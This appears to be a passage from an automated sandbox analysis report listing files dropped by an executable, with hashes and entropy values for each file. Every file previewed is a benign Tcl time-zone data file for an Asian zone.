                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Magadan) {.. {-9223372036854775808 36192 0 LMT}.. {-1441188192 36000 0 +10}.. {-1247565600 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):243
                                                                                                                                                                                                                              Entropy (8bit):4.737440985553183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK5XDm2OHUVoHxYQTLQTvj1kc3gEpHkH8vScHr0:MB862hTmdHsCLTI6cQe7HHA
                                                                                                                                                                                                                              MD5:9116C0B70AB33EC49F933EAE0238FD4B
                                                                                                                                                                                                                              SHA1:BA390E8FBEAF5EA6E861AFC5A51CD4DF0B422461
                                                                                                                                                                                                                              SHA-256:30D8AB00E32ECE51442C0310E650D89D6989E0809600EE334CB10C506D84BF9D
                                                                                                                                                                                                                              SHA-512:499E60E8CBDA72226BCB4E241020E62B6F88E7D3E4329D260A6536EF87C02D7D61FD1BECC47D4FF308B4EB5D3E7FFBE2EC1C96FE2DEDC09DD1D973421C5FFE1E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Makassar) {.. {-9223372036854775808 28656 0 LMT}.. {-1577951856 28656 0 MMT}.. {-1172908656 28800 0 +08}.. {-880272000 32400 0 +09}.. {-766054800 28800 0 WITA}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):421
                                                                                                                                                                                                                              Entropy (8bit):4.48495488773916
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB862GjmdHnCTZBCvEo6AwoucQzy4orjAbomAtoNv:5GjeCVwvB6AduXzylHAMmAa9
                                                                                                                                                                                                                              MD5:0FBF0ED252638DF31826C33EB3FFBFE2
                                                                                                                                                                                                                              SHA1:3496E4A5251A9BDF3AA4368297140780B6DBF66D
                                                                                                                                                                                                                              SHA-256:070D61A0E39643A700ABA89A8A4BE5733BA456958966098405E11ECDFA854D76
                                                                                                                                                                                                                              SHA-512:2A40E14964B357809E596DF88D8C4141ED78664BACA0A7724A7CA837EF427DC2B07C48D9DBE5787FAB0015673F5BDE002223D489334C5B91B74EEC5507A14B78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Manila) {.. {-9223372036854775808 -57360 0 LMT}.. {-3944621040 29040 0 LMT}.. {-2229321840 28800 0 PST}.. {-1046678400 32400 1 PDT}.. {-1038733200 28800 0 PST}.. {-873273600 32400 0 JST}.. {-794221200 28800 0 PST}.. {-496224000 32400 1 PDT}.. {-489315600 28800 0 PST}.. {259344000 32400 1 PDT}.. {275151600 28800 0 PST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                              Entropy (8bit):4.805992552335358
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8DeXHAIgN6S7ARL/2WFKvE+H+WFKQ3n:SlSWB9vsM3yj+HAIgMS7AN/2wKLewKQ3
                                                                                                                                                                                                                              MD5:8AEB5C3E81069F884A370714E8013F1F
                                                                                                                                                                                                                              SHA1:4E3DD4A84627E75E84726C0CBA72CA6801280C2B
                                                                                                                                                                                                                              SHA-256:011B7DE1C9F7EC241B224BC864D8AE66ACB433FBC8AD939E4DBEB12BE6390243
                                                                                                                                                                                                                              SHA-512:50B1DE2615AE9B4781505DC709F9D07F6221D4E6D7B61D7BDA682377EAD9807F47FF0E933B79823D0DFD9F3647A82CFC28FB41FBB2226ED1D08B76F86FEB45DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Dubai)]} {.. LoadTimeZoneFile Asia/Dubai..}..set TZData(:Asia/Muscat) $TZData(:Asia/Dubai)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7625
                                                                                                                                                                                                                              Entropy (8bit):3.7113086720696398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:R3pv/7V6Aj8aZaNlKkUpvBeRF+iDlKSdkwSMTHkB2vwz59F06Kgr/y/rYjlBKb0l:R3v/AauivBeRF+W35Syrwl9h5j
                                                                                                                                                                                                                              MD5:2ADD0DFC1F133E4D044727234251A3DC
                                                                                                                                                                                                                              SHA1:0D1502986258349E384017BA6CB8FA0AC424638C
                                                                                                                                                                                                                              SHA-256:3C3E4844C70D361893EF022D6C3C8E38B243E91D40C5A726C924355476816F25
                                                                                                                                                                                                                              SHA-512:70CDD53E7E44EDABF653A4F92EECBF5BB20A31DA95D65209D1CADE7DD9FC68946B8EC8829C28AE00BE5F42AAB545B9282CBBCFC5834437D6A94A179BF4FE0141
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                              MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                              SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                              SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                              SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2121
                                                                                                                                                                                                                              Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                              MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                              SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                              SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                              SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2055
                                                                                                                                                                                                                              Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                              MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                              SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                              SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                              SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1664
                                                                                                                                                                                                                              Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                              MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                              SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                              SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                              SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                              MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                              SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                              SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                              SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                              MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                              SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                              SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                              SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):273
                                                                                                                                                                                                                              Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                              MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                              SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                              SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                              SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                              MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                              SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                              SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                              SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1668
                                                                                                                                                                                                                              Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                              MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                              SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                              SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                              SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                              MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                              SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                              SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                              SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                              MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                              SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                              SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                              SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
